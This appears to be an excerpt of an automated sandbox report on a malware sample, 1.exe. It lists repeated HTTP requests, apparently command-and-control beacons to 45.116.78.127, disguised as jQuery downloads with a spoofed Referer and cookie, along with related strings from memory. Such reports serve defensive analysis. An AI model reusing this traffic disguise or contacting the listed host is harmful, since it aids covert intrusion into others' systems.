        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: 1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649720745.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2412463885.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D9C000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2221934852.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D3C000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688451879.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2815589341.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2393356882.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.jquery.com/
        Source: 1.exe, 00000000.00000002.3273403913.000002B669D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.jquery.com/)v
        Source: 1.exe, 00000000.00000003.2068730463.000002B669D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.jquery.com/I
        Source: 1.exe, 00000000.00000003.2240965688.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2279731119.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2181244688.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2200281283.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2162144150.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2260354455.000002B669DC1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2220224689.000002B669DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.jquery.com/i
        Source: 1.exe, 00000000.00000003.2298925896.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/
        Source: 1.exe, 00000000.00000003.2883924322.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/)
        Source: 1.exe, 00000000.00000003.2922884622.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2883830642.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2903576644.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/16.78.127/
        Source: 1.exe, 00000000.00000003.2834956072.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/16.78.127/der
        Source: 1.exe, 00000000.00000003.2337185318.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2355972071.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/16.78.127/l
        Source: 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/9
        Source: 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3064219568.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/=
        Source: 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/E
        Source: 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/M
        Source: 1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196282775.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/P
        Source: 1.exe, 00000000.00000003.3234673628.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273403913.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3254523170.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/R
        Source: 1.exe, 00000000.00000003.2450698374.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/crosic
        Source: 1.exe, 00000000.00000003.2591343411.000002B669DA0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196282775.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/dep
        Source: 1.exe, 00000000.00000003.2941717680.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158599501.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669D9F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196282775.000002B669D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/der
        Source: 1.exe, 00000000.00000003.3006338364.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/e
        Source: 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/i
        Source: 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2298925896.000002B669DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js
        Source: 1.exe, 00000000.00000003.2815589341.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2611004523.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2630449376.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js)
        Source: 1.exe, 00000000.00000003.2220224689.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js-end-point:
        Source: 1.exe, 00000000.00000003.2279731119.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2299019879.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js.
        Source: 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3196424317.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js/
        Source: 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js/=
        Source: 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js/e
        Source: 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2834956072.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2688578245.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2669102576.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2762024524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2707342659.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js/rovider
        Source: 1.exe, 00000000.00000003.2570626524.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2591446515.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js0
        Source: 1.exe, 00000000.00000003.2745317730.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js5
        Source: 1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2489366194.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2855873160.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2726918993.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.js=
        Source: 1.exe, 00000000.00000003.3215560010.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3234770394.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3158738259.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3045966688.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000002.3273561662.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3138732447.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3119307893.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3102254380.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2649858391.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.3025923840.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsB_F
        Source: 1.exe, 00000000.00000003.2796448604.000002B669DF7000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000000.00000003.2780254740.000002B669DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.116.78.127/jquery-3.3.1.min.jsC
